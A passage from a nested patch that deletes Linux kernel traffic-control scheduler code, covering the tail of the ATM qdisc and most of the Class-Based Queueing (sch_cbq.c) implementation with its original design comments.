+-	struct atm_flow_data *flow = (struct atm_flow_data *)cl;
+-	struct nlattr *nest;
+-
+-	pr_debug("atm_tc_dump_class(sch %p,[qdisc %p],flow %p,skb %p,tcm %p)\n",
+-		sch, p, flow, skb, tcm);
+-	if (list_empty(&flow->list))
+-		return -EINVAL;
+-	tcm->tcm_handle = flow->common.classid;
+-	tcm->tcm_info = flow->q->handle;
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-
+-	if (nla_put(skb, TCA_ATM_HDR, flow->hdr_len, flow->hdr))
+-		goto nla_put_failure;
+-	if (flow->vcc) {
+-		struct sockaddr_atmpvc pvc;
+-		int state;
+-
+-		memset(&pvc, 0, sizeof(pvc));
+-		pvc.sap_family = AF_ATMPVC;
+-		pvc.sap_addr.itf = flow->vcc->dev ? flow->vcc->dev->number : -1;
+-		pvc.sap_addr.vpi = flow->vcc->vpi;
+-		pvc.sap_addr.vci = flow->vcc->vci;
+-		if (nla_put(skb, TCA_ATM_ADDR, sizeof(pvc), &pvc))
+-			goto nla_put_failure;
+-		state = ATM_VF2VS(flow->vcc->flags);
+-		if (nla_put_u32(skb, TCA_ATM_STATE, state))
+-			goto nla_put_failure;
+-	}
+-	if (flow->excess) {
+-		if (nla_put_u32(skb, TCA_ATM_EXCESS, flow->common.classid))
+-			goto nla_put_failure;
+-	} else {
+-		if (nla_put_u32(skb, TCA_ATM_EXCESS, 0))
+-			goto nla_put_failure;
+-	}
+-	return nla_nest_end(skb, nest);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-static int
+-atm_tc_dump_class_stats(struct Qdisc *sch, unsigned long arg,
+-			struct gnet_dump *d)
+-{
+-	struct atm_flow_data *flow = (struct atm_flow_data *)arg;
+-
+-	if (gnet_stats_copy_basic(d, NULL, &flow->bstats, true) < 0 ||
+-	    gnet_stats_copy_queue(d, NULL, &flow->qstats, flow->q->q.qlen) < 0)
+-		return -1;
+-
+-	return 0;
+-}
+-
+-static int atm_tc_dump(struct Qdisc *sch, struct sk_buff *skb)
+-{
+-	return 0;
+-}
+-
+-static const struct Qdisc_class_ops atm_class_ops = {
+-	.graft		= atm_tc_graft,
+-	.leaf		= atm_tc_leaf,
+-	.find		= atm_tc_find,
+-	.change		= atm_tc_change,
+-	.delete		= atm_tc_delete,
+-	.walk		= atm_tc_walk,
+-	.tcf_block	= atm_tc_tcf_block,
+-	.bind_tcf	= atm_tc_bind_filter,
+-	.unbind_tcf	= atm_tc_put,
+-	.dump		= atm_tc_dump_class,
+-	.dump_stats	= atm_tc_dump_class_stats,
+-};
+-
+-static struct Qdisc_ops atm_qdisc_ops __read_mostly = {
+-	.cl_ops		= &atm_class_ops,
+-	.id		= "atm",
+-	.priv_size	= sizeof(struct atm_qdisc_data),
+-	.enqueue	= atm_tc_enqueue,
+-	.dequeue	= atm_tc_dequeue,
+-	.peek		= atm_tc_peek,
+-	.init		= atm_tc_init,
+-	.reset		= atm_tc_reset,
+-	.destroy	= atm_tc_destroy,
+-	.dump		= atm_tc_dump,
+-	.owner		= THIS_MODULE,
+-};
+-
+-static int __init atm_init(void)
+-{
+-	return register_qdisc(&atm_qdisc_ops);
+-}
+-
+-static void __exit atm_exit(void)
+-{
+-	unregister_qdisc(&atm_qdisc_ops);
+-}
+-
+-module_init(atm_init)
+-module_exit(atm_exit)
+-MODULE_LICENSE("GPL");
+diff --git a/net/sched/sch_cbq.c b/net/sched/sch_cbq.c
+deleted file mode 100644
+index 36db5f6782f2c..0000000000000
+--- a/net/sched/sch_cbq.c
++++ /dev/null
+@@ -1,1727 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * net/sched/sch_cbq.c	Class-Based Queueing discipline.
+- *
+- * Authors:	Alexey Kuznetsov, <kuznet@ms2.inr.ac.ru>
+- */
+-
+-#include <linux/module.h>
+-#include <linux/slab.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/skbuff.h>
+-#include <net/netlink.h>
+-#include <net/pkt_sched.h>
+-#include <net/pkt_cls.h>
+-
+-
+-/*	Class-Based Queueing (CBQ) algorithm.
+-	=======================================
+-
+-	Sources: [1] Sally Floyd and Van Jacobson, "Link-sharing and Resource
+-		 Management Models for Packet Networks",
+-		 IEEE/ACM Transactions on Networking, Vol.3, No.4, 1995
+-
+-		 [2] Sally Floyd, "Notes on CBQ and Guaranteed Service", 1995
+-
+-		 [3] Sally Floyd, "Notes on Class-Based Queueing: Setting
+-		 Parameters", 1996
+-
+-		 [4] Sally Floyd and Michael Speer, "Experimental Results
+-		 for Class-Based Queueing", 1998, not published.
+-
+-	-----------------------------------------------------------------------
+-
+-	Algorithm skeleton was taken from NS simulator cbq.cc.
+-	If someone wants to check this code against the LBL version,
+-	he should take into account that ONLY the skeleton was borrowed,
+-	the implementation is different. Particularly:
+-
+-	--- The WRR algorithm is different. Our version looks more
+-	reasonable (I hope) and works when quanta are allowed to be
+-	less than MTU, which is always the case when real time classes
+-	have small rates. Note, that the statement of [3] is
+-	incomplete, delay may actually be estimated even if class
+-	per-round allotment is less than MTU. Namely, if per-round
+-	allotment is W*r_i, and r_1+...+r_k = r < 1
+-
+-	delay_i <= ([MTU/(W*r_i)]*W*r + W*r + k*MTU)/B
+-
+-	In the worst case we have IntServ estimate with D = W*r+k*MTU
+-	and C = MTU*r. The proof (if correct at all) is trivial.
+-
+-
+-	--- It seems that cbq-2.0 is not very accurate. At least, I cannot
+-	interpret some places, which look like wrong translations
+-	from NS. Anyone is advised to find these differences
+-	and explain to me, why I am wrong 8).
+-
+-	--- Linux has no EOI event, so that we cannot estimate true class
+-	idle time. Workaround is to consider the next dequeue event
+-	as sign that previous packet is finished. This is wrong because of
+-	internal device queueing, but on a permanently loaded link it is true.
+-	Moreover, combined with clock integrator, this scheme looks
+-	very close to an ideal solution.  */
+-
+-struct cbq_sched_data;
+-
+-
+-struct cbq_class {
+-	struct Qdisc_class_common common;
+-	struct cbq_class	*next_alive;	/* next class with backlog in this priority band */
+-
+-/* Parameters */
+-	unsigned char		priority;	/* class priority */
+-	unsigned char		priority2;	/* priority to be used after overlimit */
+-	unsigned char		ewma_log;	/* time constant for idle time calculation */
+-
+-	u32			defmap;
+-
+-	/* Link-sharing scheduler parameters */
+-	long			maxidle;	/* Class parameters: see below. */
+-	long			offtime;
+-	long			minidle;
+-	u32			avpkt;
+-	struct qdisc_rate_table	*R_tab;
+-
+-	/* General scheduler (WRR) parameters */
+-	long			allot;
+-	long			quantum;	/* Allotment per WRR round */
+-	long			weight;		/* Relative allotment: see below */
+-
+-	struct Qdisc		*qdisc;		/* Ptr to CBQ discipline */
+-	struct cbq_class	*split;		/* Ptr to split node */
+-	struct cbq_class	*share;		/* Ptr to LS parent in the class tree */
+-	struct cbq_class	*tparent;	/* Ptr to tree parent in the class tree */
+-	struct cbq_class	*borrow;	/* NULL if class is bandwidth limited;
+-						   parent otherwise */
+-	struct cbq_class	*sibling;	/* Sibling chain */
+-	struct cbq_class	*children;	/* Pointer to children chain */
+-
+-	struct Qdisc		*q;		/* Elementary queueing discipline */
+-
+-
+-/* Variables */
+-	unsigned char		cpriority;	/* Effective priority */
+-	unsigned char		delayed;
+-	unsigned char		level;		/* level of the class in hierarchy:
+-						   0 for leaf classes, and maximal
+-						   level of children + 1 for nodes.
+-						 */
+-
+-	psched_time_t		last;		/* Last end of service */
+-	psched_time_t		undertime;
+-	long			avgidle;
+-	long			deficit;	/* Saved deficit for WRR */
+-	psched_time_t		penalized;
+-	struct gnet_stats_basic_sync bstats;
+-	struct gnet_stats_queue qstats;
+-	struct net_rate_estimator __rcu *rate_est;
+-	struct tc_cbq_xstats	xstats;
+-
+-	struct tcf_proto __rcu	*filter_list;
+-	struct tcf_block	*block;
+-
+-	int			filters;
+-
+-	struct cbq_class	*defaults[TC_PRIO_MAX + 1];
+-};
+-
+-struct cbq_sched_data {
+-	struct Qdisc_class_hash	clhash;			/* Hash table of all classes */
+-	int			nclasses[TC_CBQ_MAXPRIO + 1];
+-	unsigned int		quanta[TC_CBQ_MAXPRIO + 1];
+-
+-	struct cbq_class	link;
+-
+-	unsigned int		activemask;
+-	struct cbq_class	*active[TC_CBQ_MAXPRIO + 1];	/* List of all classes
+-								   with backlog */
+-
+-#ifdef CONFIG_NET_CLS_ACT
+-	struct cbq_class	*rx_class;
+-#endif
+-	struct cbq_class	*tx_class;
+-	struct cbq_class	*tx_borrowed;
+-	int			tx_len;
+-	psched_time_t		now;		/* Cached timestamp */
+-	unsigned int		pmask;
+-
+-	struct qdisc_watchdog	watchdog;	/* Watchdog timer,
+-						   started when CBQ has
+-						   backlog, but cannot
+-						   transmit just now */
+-	psched_tdiff_t		wd_expires;
+-	int			toplevel;
+-	u32			hgenerator;
+-};
+-
+-
+-#define L2T(cl, len)	qdisc_l2t((cl)->R_tab, len)
+-
+-static inline struct cbq_class *
+-cbq_class_lookup(struct cbq_sched_data *q, u32 classid)
+-{
+-	struct Qdisc_class_common *clc;
+-
+-	clc = qdisc_class_find(&q->clhash, classid);
+-	if (clc == NULL)
+-		return NULL;
+-	return container_of(clc, struct cbq_class, common);
+-}
+-
+-#ifdef CONFIG_NET_CLS_ACT
+-
+-static struct cbq_class *
+-cbq_reclassify(struct sk_buff *skb, struct cbq_class *this)
+-{
+-	struct cbq_class *cl;
+-
+-	for (cl = this->tparent; cl; cl = cl->tparent) {
+-		struct cbq_class *new = cl->defaults[TC_PRIO_BESTEFFORT];
+-
+-		if (new != NULL && new != this)
+-			return new;
+-	}
+-	return NULL;
+-}
+-
+-#endif
+-
+-/* Classify packet. The procedure is pretty complicated, but
+- * it allows us to combine link sharing and priority scheduling
+- * transparently.
+- *
+- * Namely, you can put link sharing rules (f.e. route based) at root of CBQ,
+- * so that it resolves to split nodes. Then packets are classified
+- * by logical priority, or a more specific classifier may be attached
+- * to the split node.
+- */
+-
+-static struct cbq_class *
+-cbq_classify(struct sk_buff *skb, struct Qdisc *sch, int *qerr)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *head = &q->link;
+-	struct cbq_class **defmap;
+-	struct cbq_class *cl = NULL;
+-	u32 prio = skb->priority;
+-	struct tcf_proto *fl;
+-	struct tcf_result res;
+-
+-	/*
+-	 *  Step 1. If skb->priority points to one of our classes, use it.
+-	 */
+-	if (TC_H_MAJ(prio ^ sch->handle) == 0 &&
+-	    (cl = cbq_class_lookup(q, prio)) != NULL)
+-		return cl;
+-
+-	*qerr = NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
+-	for (;;) {
+-		int result = 0;
+-		defmap = head->defaults;
+-
+-		fl = rcu_dereference_bh(head->filter_list);
+-		/*
+-		 * Step 2+n. Apply classifier.
+-		 */
+-		result = tcf_classify(skb, NULL, fl, &res, true);
+-		if (!fl || result < 0)
+-			goto fallback;
+-		if (result == TC_ACT_SHOT)
+-			return NULL;
+-
+-		cl = (void *)res.class;
+-		if (!cl) {
+-			if (TC_H_MAJ(res.classid))
+-				cl = cbq_class_lookup(q, res.classid);
+-			else if ((cl = defmap[res.classid & TC_PRIO_MAX]) == NULL)
+-				cl = defmap[TC_PRIO_BESTEFFORT];
+-
+-			if (cl == NULL)
+-				goto fallback;
+-		}
+-		if (cl->level >= head->level)
+-			goto fallback;
+-#ifdef CONFIG_NET_CLS_ACT
+-		switch (result) {
+-		case TC_ACT_QUEUED:
+-		case TC_ACT_STOLEN:
+-		case TC_ACT_TRAP:
+-			*qerr = NET_XMIT_SUCCESS | __NET_XMIT_STOLEN;
+-			fallthrough;
+-		case TC_ACT_RECLASSIFY:
+-			return cbq_reclassify(skb, cl);
+-		}
+-#endif
+-		if (cl->level == 0)
+-			return cl;
+-
+-		/*
+-		 * Step 3+n. If classifier selected a link sharing class,
+-		 *	   apply agency specific classifier.
+-		 *	   Repeat this procedure until we hit a leaf node.
+-		 */
+-		head = cl;
+-	}
+-
+-fallback:
+-	cl = head;
+-
+-	/*
+-	 * Step 4. No success...
+-	 */
+-	if (TC_H_MAJ(prio) == 0 &&
+-	    !(cl = head->defaults[prio & TC_PRIO_MAX]) &&
+-	    !(cl = head->defaults[TC_PRIO_BESTEFFORT]))
+-		return head;
+-
+-	return cl;
+-}
+-
+-/*
+- * A packet has just been enqueued on the empty class.
+- * cbq_activate_class adds it to the tail of active class list
+- * of its priority band.
+- */
+-
+-static inline void cbq_activate_class(struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-	int prio = cl->cpriority;
+-	struct cbq_class *cl_tail;
+-
+-	cl_tail = q->active[prio];
+-	q->active[prio] = cl;
+-
+-	if (cl_tail != NULL) {
+-		cl->next_alive = cl_tail->next_alive;
+-		cl_tail->next_alive = cl;
+-	} else {
+-		cl->next_alive = cl;
+-		q->activemask |= (1<<prio);
+-	}
+-}
+-
+-/*
+- * Unlink class from active chain.
+- * Note that this same procedure is done directly in cbq_dequeue*
+- * during round-robin procedure.
+- */
+-
+-static void cbq_deactivate_class(struct cbq_class *this)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(this->qdisc);
+-	int prio = this->cpriority;
+-	struct cbq_class *cl;
+-	struct cbq_class *cl_prev = q->active[prio];
+-
+-	do {
+-		cl = cl_prev->next_alive;
+-		if (cl == this) {
+-			cl_prev->next_alive = cl->next_alive;
+-			cl->next_alive = NULL;
+-
+-			if (cl == q->active[prio]) {
+-				q->active[prio] = cl_prev;
+-				if (cl == q->active[prio]) {
+-					q->active[prio] = NULL;
+-					q->activemask &= ~(1<<prio);
+-					return;
+-				}
+-			}
+-			return;
+-		}
+-	} while ((cl_prev = cl) != q->active[prio]);
+-}
+-
+-static void
+-cbq_mark_toplevel(struct cbq_sched_data *q, struct cbq_class *cl)
+-{
+-	int toplevel = q->toplevel;
+-
+-	if (toplevel > cl->level) {
+-		psched_time_t now = psched_get_time();
+-
+-		do {
+-			if (cl->undertime < now) {
+-				q->toplevel = cl->level;
+-				return;
+-			}
+-		} while ((cl = cl->borrow) != NULL && toplevel > cl->level);
+-	}
+-}
+-
+-static int
+-cbq_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+-	    struct sk_buff **to_free)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	int ret;
+-	struct cbq_class *cl = cbq_classify(skb, sch, &ret);
+-
+-#ifdef CONFIG_NET_CLS_ACT
+-	q->rx_class = cl;
+-#endif
+-	if (cl == NULL) {
+-		if (ret & __NET_XMIT_BYPASS)
+-			qdisc_qstats_drop(sch);
+-		__qdisc_drop(skb, to_free);
+-		return ret;
+-	}
+-
+-	ret = qdisc_enqueue(skb, cl->q, to_free);
+-	if (ret == NET_XMIT_SUCCESS) {
+-		sch->q.qlen++;
+-		cbq_mark_toplevel(q, cl);
+-		if (!cl->next_alive)
+-			cbq_activate_class(cl);
+-		return ret;
+-	}
+-
+-	if (net_xmit_drop_count(ret)) {
+-		qdisc_qstats_drop(sch);
+-		cbq_mark_toplevel(q, cl);
+-		cl->qstats.drops++;
+-	}
+-	return ret;
+-}
+-
+-/* Overlimit action: penalize leaf class by adding offtime */
+-static void cbq_overlimit(struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-	psched_tdiff_t delay = cl->undertime - q->now;
+-
+-	if (!cl->delayed) {
+-		delay += cl->offtime;
+-
+-		/*
+-		 * Class goes to sleep, so that it will have no
+-		 * chance to work avgidle. Let's forgive it 8)
+-		 *
+-		 * BTW cbq-2.0 has a crap in this
+-		 * place, apparently they forgot to shift it by cl->ewma_log.
+-		 */
+-		if (cl->avgidle < 0)
+-			delay -= (-cl->avgidle) - ((-cl->avgidle) >> cl->ewma_log);
+-		if (cl->avgidle < cl->minidle)
+-			cl->avgidle = cl->minidle;
+-		if (delay <= 0)
+-			delay = 1;
+-		cl->undertime = q->now + delay;
+-
+-		cl->xstats.overactions++;
+-		cl->delayed = 1;
+-	}
+-	if (q->wd_expires == 0 || q->wd_expires > delay)
+-		q->wd_expires = delay;
+-
+-	/* Dirty work! We must schedule wakeups based on
+-	 * real available rate, rather than leaf rate,
+-	 * which may be tiny (even zero).
+-	 */
+-	if (q->toplevel == TC_CBQ_MAXLEVEL) {
+-		struct cbq_class *b;
+-		psched_tdiff_t base_delay = q->wd_expires;
+-
+-		for (b = cl->borrow; b; b = b->borrow) {
+-			delay = b->undertime - q->now;
+-			if (delay < base_delay) {
+-				if (delay <= 0)
+-					delay = 1;
+-				base_delay = delay;
+-			}
+-		}
+-
+-		q->wd_expires = base_delay;
+-	}
+-}
+-
+-/*
+- * It is mission critical procedure.
+- *
+- * We "regenerate" toplevel cutoff, if transmitting class
+- * has backlog and it is not regulated. It is not part of
+- * original CBQ description, but looks more reasonable.
+- * Probably, it is wrong. This question needs further investigation.
+- */
+-
+-static inline void
+-cbq_update_toplevel(struct cbq_sched_data *q, struct cbq_class *cl,
+-		    struct cbq_class *borrowed)
+-{
+-	if (cl && q->toplevel >= borrowed->level) {
+-		if (cl->q->q.qlen > 1) {
+-			do {
+-				if (borrowed->undertime == PSCHED_PASTPERFECT) {
+-					q->toplevel = borrowed->level;
+-					return;
+-				}
+-			} while ((borrowed = borrowed->borrow) != NULL);
+-		}
+-#if 0
+-	/* It is not necessary now. Uncommenting it
+-	   will save CPU cycles, but decrease fairness.
+-	 */
+-		q->toplevel = TC_CBQ_MAXLEVEL;
+-#endif
+-	}
+-}
+-
+-static void
+-cbq_update(struct cbq_sched_data *q)
+-{
+-	struct cbq_class *this = q->tx_class;
+-	struct cbq_class *cl = this;
+-	int len = q->tx_len;
+-	psched_time_t now;
+-
+-	q->tx_class = NULL;
+-	/* Time integrator. We calculate EOS time
+-	 * by adding expected packet transmission time.
+-	 */
+-	now = q->now + L2T(&q->link, len);
+-
+-	for ( ; cl; cl = cl->share) {
+-		long avgidle = cl->avgidle;
+-		long idle;
+-
+-		_bstats_update(&cl->bstats, len, 1);
+-
+-		/*
+-		 * (now - last) is total time between packet right edges.
+-		 * (last_pktlen/rate) is "virtual" busy time, so that
+-		 *
+-		 *	idle = (now - last) - last_pktlen/rate
+-		 */
+-
+-		idle = now - cl->last;
+-		if ((unsigned long)idle > 128*1024*1024) {
+-			avgidle = cl->maxidle;
+-		} else {
+-			idle -= L2T(cl, len);
+-
+-		/* true_avgidle := (1-W)*true_avgidle + W*idle,
+-		 * where W=2^{-ewma_log}. But cl->avgidle is scaled:
+-		 * cl->avgidle == true_avgidle/W,
+-		 * hence:
+-		 */
+-			avgidle += idle - (avgidle>>cl->ewma_log);
+-		}
+-
+-		if (avgidle <= 0) {
+-			/* Overlimit or at-limit */
+-
+-			if (avgidle < cl->minidle)
+-				avgidle = cl->minidle;
+-
+-			cl->avgidle = avgidle;
+-
+-			/* Calculate expected time, when this class
+-			 * will be allowed to send.
+-			 * It will occur, when:
+-			 * (1-W)*true_avgidle + W*delay = 0, i.e.
+-			 * idle = (1/W - 1)*(-true_avgidle)
+-			 * or
+-			 * idle = (1 - W)*(-cl->avgidle);
+-			 */
+-			idle = (-avgidle) - ((-avgidle) >> cl->ewma_log);
+-
+-			/*
+-			 * That is not all.
+-			 * To maintain the rate allocated to the class,
+-			 * we add to undertime virtual clock,
+-			 * necessary to complete transmitted packet.
+-			 * (len/phys_bandwidth has been already passed
+-			 * to the moment of cbq_update)
+-			 */
+-
+-			idle -= L2T(&q->link, len);
+-			idle += L2T(cl, len);
+-
+-			cl->undertime = now + idle;
+-		} else {
+-			/* Underlimit */
+-
+-			cl->undertime = PSCHED_PASTPERFECT;
+-			if (avgidle > cl->maxidle)
+-				cl->avgidle = cl->maxidle;
+-			else
+-				cl->avgidle = avgidle;
+-		}
+-		if ((s64)(now - cl->last) > 0)
+-			cl->last = now;
+-	}
+-
+-	cbq_update_toplevel(q, this, q->tx_borrowed);
+-}
+-
+-static inline struct cbq_class *
+-cbq_under_limit(struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-	struct cbq_class *this_cl = cl;
+-
+-	if (cl->tparent == NULL)
+-		return cl;
+-
+-	if (cl->undertime == PSCHED_PASTPERFECT || q->now >= cl->undertime) {
+-		cl->delayed = 0;
+-		return cl;
+-	}
+-
+-	do {
+-		/* It is very suspicious place. Now overlimit
+-		 * action is generated for not bounded classes
+-		 * only if link is completely congested.
+-		 * Though it is in agree with ancestor-only paradigm,
+-		 * it looks very stupid. Particularly,
+-		 * it means that this chunk of code will either
+-		 * never be called or result in strong amplification
+-		 * of burstiness. Dangerous, silly, and, however,
+-		 * no another solution exists.
+-		 */
+-		cl = cl->borrow;
+-		if (!cl) {
+-			this_cl->qstats.overlimits++;
+-			cbq_overlimit(this_cl);
+-			return NULL;
+-		}
+-		if (cl->level > q->toplevel)
+-			return NULL;
+-	} while (cl->undertime != PSCHED_PASTPERFECT && q->now < cl->undertime);
+-
+-	cl->delayed = 0;
+-	return cl;
+-}
+-
+-static inline struct sk_buff *
+-cbq_dequeue_prio(struct Qdisc *sch, int prio)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct cbq_class *cl_tail, *cl_prev, *cl;
+-	struct sk_buff *skb;
+-	int deficit;
+-
+-	cl_tail = cl_prev = q->active[prio];
+-	cl = cl_prev->next_alive;
+-
+-	do {
+-		deficit = 0;
+-
+-		/* Start round */
+-		do {
+-			struct cbq_class *borrow = cl;
+-
+-			if (cl->q->q.qlen &&
+-			    (borrow = cbq_under_limit(cl)) == NULL)
+-				goto skip_class;
+-
+-			if (cl->deficit <= 0) {
+-				/* Class exhausted its allotment per
+-				 * this round. Switch to the next one.
+-				 */
+-				deficit = 1;
+-				cl->deficit += cl->quantum;
+-				goto next_class;
+-			}
+-
+-			skb = cl->q->dequeue(cl->q);
+-
+-			/* Class did not give us any skb :-(
+-			 * It could occur even if cl->q->q.qlen != 0
+-			 * f.e. if cl->q == "tbf"
+-			 */
+-			if (skb == NULL)
+-				goto skip_class;
+-
+-			cl->deficit -= qdisc_pkt_len(skb);
+-			q->tx_class = cl;
+-			q->tx_borrowed = borrow;
+-			if (borrow != cl) {
+-#ifndef CBQ_XSTATS_BORROWS_BYTES
+-				borrow->xstats.borrows++;
+-				cl->xstats.borrows++;
+-#else
+-				borrow->xstats.borrows += qdisc_pkt_len(skb);
+-				cl->xstats.borrows += qdisc_pkt_len(skb);
+-#endif
+-			}
+-			q->tx_len = qdisc_pkt_len(skb);
+-
+-			if (cl->deficit <= 0) {
+-				q->active[prio] = cl;
+-				cl = cl->next_alive;
+-				cl->deficit += cl->quantum;
+-			}
+-			return skb;
+-
+-skip_class:
+-			if (cl->q->q.qlen == 0 || prio != cl->cpriority) {
+-				/* Class is empty or penalized.
+-				 * Unlink it from active chain.
+-				 */
+-				cl_prev->next_alive = cl->next_alive;
+-				cl->next_alive = NULL;
+-
+-				/* Did cl_tail point to it? */
+-				if (cl == cl_tail) {
+-					/* Repair it! */
+-					cl_tail = cl_prev;
+-
+-					/* Was it the last class in this band? */
+-					if (cl == cl_tail) {
+-						/* Kill the band! */
+-						q->active[prio] = NULL;
+-						q->activemask &= ~(1<<prio);
+-						if (cl->q->q.qlen)
+-							cbq_activate_class(cl);
+-						return NULL;
+-					}
+-
+-					q->active[prio] = cl_tail;
+-				}
+-				if (cl->q->q.qlen)
+-					cbq_activate_class(cl);
+-
+-				cl = cl_prev;
+-			}
+-
+-next_class:
+-			cl_prev = cl;
+-			cl = cl->next_alive;
+-		} while (cl_prev != cl_tail);
+-	} while (deficit);
+-
+-	q->active[prio] = cl_prev;
+-
+-	return NULL;
+-}
+-
+-static inline struct sk_buff *
+-cbq_dequeue_1(struct Qdisc *sch)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	struct sk_buff *skb;
+-	unsigned int activemask;
+-
+-	activemask = q->activemask & 0xFF;
+-	while (activemask) {
+-		int prio = ffz(~activemask);
+-		activemask &= ~(1<<prio);
+-		skb = cbq_dequeue_prio(sch, prio);
+-		if (skb)
+-			return skb;
+-	}
+-	return NULL;
+-}
+-
+-static struct sk_buff *
+-cbq_dequeue(struct Qdisc *sch)
+-{
+-	struct sk_buff *skb;
+-	struct cbq_sched_data *q = qdisc_priv(sch);
+-	psched_time_t now;
+-
+-	now = psched_get_time();
+-
+-	if (q->tx_class)
+-		cbq_update(q);
+-
+-	q->now = now;
+-
+-	for (;;) {
+-		q->wd_expires = 0;
+-
+-		skb = cbq_dequeue_1(sch);
+-		if (skb) {
+-			qdisc_bstats_update(sch, skb);
+-			sch->q.qlen--;
+-			return skb;
+-		}
+-
+-		/* All the classes are overlimit.
+-		 *
+-		 * It is possible, if:
+-		 *
+-		 * 1. Scheduler is empty.
+-		 * 2. Toplevel cutoff inhibited borrowing.
+-		 * 3. Root class is overlimit.
+-		 *
+-		 * Reset 2d and 3d conditions and retry.
+-		 *
+-		 * Note, that NS and cbq-2.0 are buggy, peeking
+-		 * an arbitrary class is appropriate for ancestor-only
+-		 * sharing, but not for toplevel algorithm.
+-		 *
+-		 * Our version is better, but slower, because it requires
+-		 * two passes, but it is unavoidable with top-level sharing.
+-		 */
+-
+-		if (q->toplevel == TC_CBQ_MAXLEVEL &&
+-		    q->link.undertime == PSCHED_PASTPERFECT)
+-			break;
+-
+-		q->toplevel = TC_CBQ_MAXLEVEL;
+-		q->link.undertime = PSCHED_PASTPERFECT;
+-	}
+-
+-	/* No packets in scheduler or nobody wants to give them to us :-(
+-	 * Sigh... start watchdog timer in the last case.
+-	 */
+-
+-	if (sch->q.qlen) {
+-		qdisc_qstats_overlimit(sch);
+-		if (q->wd_expires)
+-			qdisc_watchdog_schedule(&q->watchdog,
+-						now + q->wd_expires);
+-	}
+-	return NULL;
+-}
+-
+-/* CBQ class maintenance routines */
+-
+-static void cbq_adjust_levels(struct cbq_class *this)
+-{
+-	if (this == NULL)
+-		return;
+-
+-	do {
+-		int level = 0;
+-		struct cbq_class *cl;
+-
+-		cl = this->children;
+-		if (cl) {
+-			do {
+-				if (cl->level > level)
+-					level = cl->level;
+-			} while ((cl = cl->sibling) != this->children);
+-		}
+-		this->level = level + 1;
+-	} while ((this = this->tparent) != NULL);
+-}
+-
+-static void cbq_normalize_quanta(struct cbq_sched_data *q, int prio)
+-{
+-	struct cbq_class *cl;
+-	unsigned int h;
+-
+-	if (q->quanta[prio] == 0)
+-		return;
+-
+-	for (h = 0; h < q->clhash.hashsize; h++) {
+-		hlist_for_each_entry(cl, &q->clhash.hash[h], common.hnode) {
+-			/* BUGGGG... Beware! This expression suffer of
+-			 * arithmetic overflows!
+-			 */
+-			if (cl->priority == prio) {
+-				cl->quantum = (cl->weight*cl->allot*q->nclasses[prio])/
+-					q->quanta[prio];
+-			}
+-			if (cl->quantum <= 0 ||
+-			    cl->quantum > 32*qdisc_dev(cl->qdisc)->mtu) {
+-				pr_warn("CBQ: class %08x has bad quantum==%ld, repaired.\n",
+-					cl->common.classid, cl->quantum);
+-				cl->quantum = qdisc_dev(cl->qdisc)->mtu/2 + 1;
+-			}
+-		}
+-	}
+-}
+-
+-static void cbq_sync_defmap(struct cbq_class *cl)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(cl->qdisc);
+-	struct cbq_class *split = cl->split;
+-	unsigned int h;
+-	int i;
+-
+-	if (split == NULL)
+-		return;
+-
+-	for (i = 0; i <= TC_PRIO_MAX; i++) {
+-		if (split->defaults[i] == cl && !(cl->defmap & (1<<i)))
+-			split->defaults[i] = NULL;
+-	}
+-
+-	for (i = 0; i <= TC_PRIO_MAX; i++) {
+-		int level = split->level;
+-
+-		if (split->defaults[i])
+-			continue;
+-
+-		for (h = 0; h < q->clhash.hashsize; h++) {
+-			struct cbq_class *c;
+-
+-			hlist_for_each_entry(c, &q->clhash.hash[h],
+-					     common.hnode) {
+-				if (c->split == split && c->level < level &&
+-				    c->defmap & (1<<i)) {
+-					split->defaults[i] = c;
+-					level = c->level;
+-				}
+-			}
+-		}
+-	}
+-}
+-
+-static void cbq_change_defmap(struct cbq_class *cl, u32 splitid, u32 def, u32 mask)
+-{
+-	struct cbq_class *split = NULL;
+-
+-	if (splitid == 0) {
+-		split = cl->split;
+-		if (!split)
+-			return;
+-		splitid = split->common.classid;
+-	}
+-
+-	if (split == NULL || split->common.classid != splitid) {
+-		for (split = cl->tparent; split; split = split->tparent)
+-			if (split->common.classid == splitid)
+-				break;
+-	}
+-
+-	if (split == NULL)
+-		return;
+-
+-	if (cl->split != split) {
+-		cl->defmap = 0;
+-		cbq_sync_defmap(cl);
+-		cl->split = split;
+-		cl->defmap = def & mask;
+-	} else
+-		cl->defmap = (cl->defmap & ~mask) | (def & mask);
+-
+-	cbq_sync_defmap(cl);
+-}
+-
+-static void cbq_unlink_class(struct cbq_class *this)
+-{
+-	struct cbq_class *cl, **clp;
+-	struct cbq_sched_data *q = qdisc_priv(this->qdisc);
+-
+-	qdisc_class_hash_remove(&q->clhash, &this->common);
+-
+-	if (this->tparent) {
+-		clp = &this->sibling;
+-		cl = *clp;
+-		do {
+-			if (cl == this) {
+-				*clp = cl->sibling;
+-				break;
+-			}
+-			clp = &cl->sibling;
+-		} while ((cl = *clp) != this->sibling);
+-
+-		if (this->tparent->children == this) {
+-			this->tparent->children = this->sibling;
+-			if (this->sibling == this)
+-				this->tparent->children = NULL;
+-		}
+-	} else {
+-		WARN_ON(this->sibling != this);
+-	}
+-}
+-
+-static void cbq_link_class(struct cbq_class *this)
+-{
+-	struct cbq_sched_data *q = qdisc_priv(this->qdisc);
+-	struct cbq_class *parent = this->tparent;
+-
+-	this->sibling = this;
